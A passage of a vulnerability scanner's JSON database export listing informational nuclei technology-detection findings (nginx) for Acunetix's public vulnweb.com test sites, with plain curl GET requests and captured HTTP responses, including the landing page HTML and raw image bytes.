H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 296, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 1, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36' 'http://vulnweb.com'", + "type": "http", + "http_url": "http://vulnweb.com", + "discovered_date": "2024-11-13T02:35:04.843Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 297, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 112, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78' 'http://www.vulnweb.com'", + "type": "http", + "http_url": "http://www.vulnweb.com", + "discovered_date": "2024-11-13T02:35:04.935Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: www.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.78\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nEtag: W/"5f1fedf1-fb2"\r\nLast-Modified: Tue, 28 Jul 2020 09:20:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">\n<html xmlns="http://www.w3.org/1999/xhtml">\n<head>\n<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />\n<title>Acunetix Web Vulnerability Scanner - Test websites</title>\n<style type="text/css">\n<!--\n@import url("style.css");\n-->\n</style>\n</head>\n<body>\n\n\n<center>\n<br>\n\n<a href='https://www.acunetix.com/'><img src='acunetix-logo.png' border='0' alt="Acunetix website security"></a><br><br>\n<div>Vulnerable test websites for <a href='https://www.acunetix.com/vulnerability-scanner/'>Acunetix Web Vulnerability Scanner</a>.</div>\n\n<table id="one-column-emphasis" summary="Acunetix test websites" style="width:60%">\n <colgroup>\n \t<col>\n </colgroup>\n <thead>\n \t<tr style="font-size:14px">\n \t<th scope="col"><b>Name</b></th>\n <th scope="col"><b>URL</b></th>\n <th scope="col"><b>Technologies</b></th>\n\t\t\t<th scope="col"><b>Resources</b></th>\n </tr>\n </thead>\n <tbody>\n \t<tr style="font-size:14px">\n \t<td>SecurityTweets</td>\n <td><a href='http://testhtml5.vulnweb.com/'>http://testhtml5.vulnweb.com</a></td>\n <td>nginx, Python, Flask, CouchDB</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/html5-website-security/'>Review</a> Acunetix HTML5 scanner or <a href='https://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuart</td>\n <td><a href='http://testphp.vulnweb.com/'>http://testphp.vulnweb.com</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/php-security-scanner/'>Review</a> Acunetix PHP scanner or <a href='https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acuforum</td>\n <td><a href='http://testasp.vulnweb.com/'>http://testasp.vulnweb.com</a></td>\n <td>IIS, ASP, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/sql-injection/'>Review</a> Acunetix SQL scanner or <a href='https://www.acunetix.com/websitesecurity/sql-injection/'>learn more</a> on the topic.</td>\n </tr>\n \t<tr style="font-size:14px">\n \t<td>Acublog</td>\n <td><a href='http://testaspnet.vulnweb.com/'>http://testaspnet.vulnweb.com</a></td>\n <td>IIS, ASP.NET, Microsoft SQL Server</td>\n\t\t\t<td><a href='https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/'>Review</a> Acunetix network scanner or <a href='https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/'>learn more</a> on the topic.</td>\n </tr>\n\t\t<tr style="font-size:14px">\n \t<td>REST API</td>\n <td><a href='http://rest.vulnweb.com/'>http://rest.vulnweb.com/</a></td>\n <td>Apache, PHP, MySQL</td>\n\t\t\t<td><a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>Review</a> Acunetix scanner or <a href='https://www.acunetix.com/blog/articles/rest-api-security-testing-acunetix/'>learn more</a> on the topic.</td>\n </tr>\n </tbody>\n</table>\n\n<div style="background-color:lightgray;width:60%;text-align:center;font-size:14px">\n<p style="padding-left:140px;padding-right:140px"><b>Warning</b>: This site hosts intentionally vulnerable web applications. You can use these applications to understand how programming and configuration errors lead to security breaches. We created the site to help you test Acunetix but you may also use it for manual penetration testing or for educational purposes. It will help you learn about vulnerabilities such as SQL Injection, Cross-site Scripting (XSS), Cross-site Request Forgery (CSRF), and many more.</p>\n</div>\n</center>\n\n</body>\n</html>\n", + "is_llm_used": false, + "tags": [ + 5 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 298, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/technologies/tech-detect.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/tech-detect", + "template_id": "tech-detect", + "matcher_name": "nginx", + "name": "Wappalyzer Technology Detection", + "severity": 0, + "description": "", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0' 'http://testphp.vulnweb.com/pictures/7.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/7.jpg.tn", + "discovered_date": "2024-11-13T02:35:05.035Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/7.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6458\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:35:04 GMT\r\nEtag: "4dca64a1-193a"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0004\u0005\u0007\u0003\u0001\b��6\u0010\u0002\u0001\u0003\u0003\u0003\u0002\u0004\u0005\u0002\u0007\u0003\u0001\u0002\u0003\u0004\u0005\u0011\u0012!\u0006\u00131"A\u00072Qa\u0014\u0015#q�B�3CR���������\u001b\u0001\u0003\u0003\u0001\u0001\u0004\u0005\u0006\u0001\u0003\u0007\u0002��0\u0011\u0001\u0003\u0003\u0002\u0004\u0003\b\u0003\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0011!1\u0012\u0013AQaq�\u0006\u0014"2�������\u0015B��\f\u0003\u0001\u0002\u0011\u0003\u0011?��I�KMc��������^�ܡ�y!�2��w\u0005c�ϓϑ�\u0019�|x�\u001bT]K=$4n�2�\u0014ʌb��\f�\u0018,1φ�G�Qz~��=t�W�\u0002\u001aF*�O0uw�G�����|��q�7<6nI��<��\u0012)]%?��@�\u000ez�q���\u0014\u0003�s�j~��E ����μ��\u0017�Rׄ�H�7Y_$�5��T��\u0018Bʤ���������}\u001d�&�#R���O�d>�� y�\u001c��\u0007VR\u001c�\u0001u�v�4*Q�\u0018�� ���ަ\u0003\n\u0014�;���\f�ppt5\\��a�l\u0006��:�L��\u00059\u0007$�5ǧ�3����i��vb`�J�d�\u000f��jNﶃ:B�u�)�2\u001fS;�\u0014�"�İ�\u0007r�\u0004K1\u0003h�\u0003:.W��Y���;�w\nCI9������\tϝ3w�H��D�p�f�y�\u000b\rp���\u00171�~\u000e7x϶uWCw�D�\u000b�\u0012E@�\u000e�\u0018\u0012FAR}���\u000f\u0007\u0004\u00105:V���r����0�ѐ7W\f��\u0017n04� o}r�N>��+\rb�':�6Ll\u0011��8lx�Bt���c+[����\u000fIt�j�Y!��!�^�qʑ�,{�疉q�_�����d\u0014��G$P��\n\u000eԳ��\r�R����<g\u001cx�]�H�\u001dT�J�VشQ��l�dd�\u0003$g*\b\u0004��:�r�\u001bg�M$�\u0004h����V�Km\u0018珮F�E\u001bc����\u0018�󟲧�Ϛ�\u001b �S�v�������\u000b�\u0012�\bc}�PHq��������KQ\u001cK�WD\\��8��\u000f�Ӭ��R��i�#U+:Y�JJ���2B��\fW ��A�q�\u0019�Ρy�i��;^\u0013�4�8\u001f}}a|\u0012�\\Zu���\u0015\u001eP���±�\u0004�\u0006�//_\f�OC��\u0014KP�Xa/�j�!F\u0007k8;�@%x$`�Rx�_U\n��b��I\u0005E\u001c��%1�8�;����`����\u0007:Ww��L��rF�P{;8�����u'���\\::�b\u00163G�B�!;Ӎ�\u001caW����<\u000fa�$�`s���+䦪Ji�\u0018\u0012Aߌ+.\u001d_��\u0005P��]X\u0001��6�Z�8�\u001eK�\u0018D\u0019c�\u0018\u001a�����k��[o4O\u0015nk[����}ƚ�}�7u�Ĵ3H��M�7q&��*����N\u0007��p�ա�w�q���~�\u0001�~���=��E�锳�|��Lnp�\\3$\u000e���1����\n��;�B����(b�G�8c�\u0001vg,Ac�\u0013$�\u0005�J^�^=����ϝ\nu+�QG:\u0019B\f\u001c�#��΄�`q\u0012��M�\u0013[[�C�x�]��\u00158�4F:s\u0013"���RRT�y ���|���R�3��\u0002��ܮ}\u0011=ʎ\u0016���(bhi`H�\u0011\u0005";\u0011F�I�\n�?0b��:z�=L�4ҁ�\b�\u0001G\u0007�}������<���\u001c`t�?�8�X\u001bN�$/�[Vt�<\u001c���imS�@er�C\f\u0011�\fu\u0005������B��v�C�8� �8� ��D��uC�Z�H�s\t��Ͼ|\u0018�>O�\b\u001e��� ��\u0016�\u001d\u001c�!�>(*�Vl�PϲX�gqHӘ�]��\t\f��6L\u001cn8q.\u0015A\u0018!���5����'���\u0013�\u0016\u0013\u0006\u0014�9`�\u0005\b;9\u0007$�\u0003�hJ��ӳ�I�u=]\u0015X\u0002�\f�\u000b�'�T�_<����\u0001l��̴\u00157\u001b|�!�Id�\u0015-\u0018��w+6_�\u000b����|���jJ:��r�,\f���L\u001d�����5\u0015%W\r�\u0013��p5$�\u0016�iHऎ\u0018c\u0011"q�\fs�~�\u001f�����{�(\n1��7\u001c}��mH�ީ�\u000f�2f�i=��L�������a���2F�\f$esɩ�yt�\u0007����w\u001d7��\u0003g��':ނ�Ls�Uq\t#`@ �}KsƸK�5�j\u0016��i�@�].\u0004sȒƵ\u0012\f���퐟�p��\u0004����d\u0012\u0015��*�t�U�Lf�a\u0006A\u0002\u0017S\u001b�;�������\f0q�\u0005�u���_P6ᐰ#�\n��\u0011�\b��\u0013[)�p����KOz��r��\u0006p�$���r��[y��M;\u001ao�4���!f, /�ع^\u0010�`�\u0005\u0001ƢuM/P��%���L��1H���e�5��&с�(]��!G\u0003R:�\u0014J\t��4��e�y���%�\u000e���|g\u0019�\u0001$�~f�=Uj�u\u0015�Jj��AQG:�-c���������\u000eq��#��ˑ����~r0s��˷n�����l�s1���GIw�\u0012CW\u0004���v�s�G\u001c\u00022\u000e\b������sQQ\f��\u001dE-<2"��� �eV��q��9��r\u0018����0�Xk�\u0006����\u0014J�u��\u000e��\n2�\u001d��2.\u0014r@<x�k=MT߄\u0012,P��,-Q\u001a�r��=L1�p`s���x�=�hk�#9#ӧ�\n�C�'�f�>�h��%���^mv��K�]R�5=��;>%œ�8\u001bO,7z�g蹵%ud�2=�R:�w�D\u0011�\u0013�\u0017n���\u00047<�\f�\u001b�AƑ��Aq�|=���-p\\j\u0016&�U\u0003d����X�0US\u0019l`\u0005*��g\u0015���x��!�����\u0014HY���9�\u000f��og�k�6��8;��&�Vq�#ܕ�����z��T�9q\u0018\nN�p\u0007�Q��-\u0018��\u001aeK�B\u000f ����\u0017d.*Ȱ�U=��M|���i�A&�0ʮ��A\r�O>x��\u000f �r�^����b��i]c�!M嘜\u0001�;� \u0001�<�3_QJ�j�\b\u0012/y�Ā(p�,�W\fW!q�\u0004z��Ƞ��e�\u0011�_Qr��Ă\u001bz%E<�����Gc�S\u0012�|����3��)�"�{\twq���㺴�����̍ÇM5�׺�@����V�m��\u0019dd��d��!]��)��%Gd�\u0017h݃��wr���{b�jƪ\tQOH#\u0005�y�1���7�p\u0014��\u0017\frqik�K=m<�co����r�\u0015��ͶH"pCD���\u0013��@*FA\u0019:�q��\u001c��Qx�?��JcV���~�&U�\u0018�\u001e�ަ%@!�\u0018k���TD̐5\u001d����[��(��;���\u001b}�.VO̩%�\u0013��B���\b+�FőNH��\u001c0�:9��CGM\u001c\u0014�G\u0014(X�"�\u0001>O�p�>p��4\u0003C%e��=\u0015E��FD�1��ң\u0010��Xn�Y\u0018\u0016![,U�쓫UCMM\u001b�m\u0013\u0011����ŞA;\u0004��q��(\u001fh�t\u000e�G��t��\n�\u001b?���� �~���\u0007��eH\u0016\u0015!�\u001c�rc��"eo���׌�����\f!)\u000eO��\u001b�ttQ��p\fq�#2�Ԝ\u0003�\u0007?��[���5]Z�Dp��6KHi�F�����d k�C��\u000bURW%1h�f�0LNHʹ\u0005pp�[$\u00128�1�����4k4k\ftp�Q�j\u0014\u0006\u0005���\u0004d�b>��涁d1\u0019^I;_/u�`�U�Ͼ�PO�(\u001eڪ�Sb'\n9�\u001a����;�Q�\u001bco�V��(�o.�`\u001e�砺��=\u001bU4�_s���̴�0H�`�]�%�ڛd9\u001e��ǖ�jΣ�{���%m��$��Mٍ�i�A�~�\u0007 ��g!��+����X��G'|�L��\u0015�U5��F\u0019��8���^K\u0013C̣-9�m\u0015<w\u0010�\u0019��{���|A�Z��qhb��X)��V.�\n$��V��>�Ab����3���m����Z�����h�H�ե��nL��!M���#:=�-Cp4��V��e�d��\u0004��$�]�9\f�\u0001�<c\u001ccZGZOWm����Ve���5c*&��O�n�9<����5΢�ݣ9\u0019�����MyBQ�wY�w�*\f\u0001fWڏ\u000e��\u0012��\u0019�8]�a\u0019\u0004��\u001fQ[SU���\u001c\u0014�ћ\\Tp\\.\u0017j�V���!\u000b\u0012�QcUe-�d����P;����E4d�)h��3���� \u0012\u0001ǶH��uk}ɵ-.����gO��7;G���-ӿs�N�VDA\u0019ld�J�2$\u0003��p���7U.�Y%��Z%�����e�\u0003~>V%X��'����\u0018%z�WM;F�v\u001f�����é����}?UCp�[�vj�Tn��~�ɂ�F1����O,t��q�\b��Ϗ�T��m��8;��+A�KUl�W$�{c�;��ȩj'W\u0006\u0005A�\u001bҪIS���<��\rc\u0015\u0015�_���qV\u001d�aI6\u000e��]�\r�U���\n�[WY]h�J��m��WYd�����J�(��Q\u0013v��@_�Q��s�ܱ��5��A\u0007b��9h�+$�UWA�Hm�GX�\u0003\u0003f�ƒ��Y%����.'\u0019=3���\u0015E�����\u0001���r��A�x^E���@'����\u001af\u001bF��6��@�<�",c��J)c�!|\f�g�\u0001���%�\u000f��m!xo��\\���9���<U���<�\r��OG\u0019�D�3�F|�i�*������.�\r\u001fv��X;��h{���\\\u0005]�rJ���<�:����D�;!��"�v�z�V+����O�V���xRV=Ѝ�\u0004��D���j��\u0015$�M��:\u0003�T���ۜ��[;�\u0010IfR�N\u000b\u001e[�\u0006p<h�)�#Ս\u000fo|�\u0010e:�|�\u0011��c��\u0010�}�uf�\fq�������-Mgj&bx\u0003?MA��e\f$�H$\u001c4r.�S�y\u0007�\u001f��t�\u0007�:�c�yo\u0018\u001a\u0005"��\u001b��5c�����z\u000e\u000f��Е\\�T��[N��;��*�i��U�e�$c 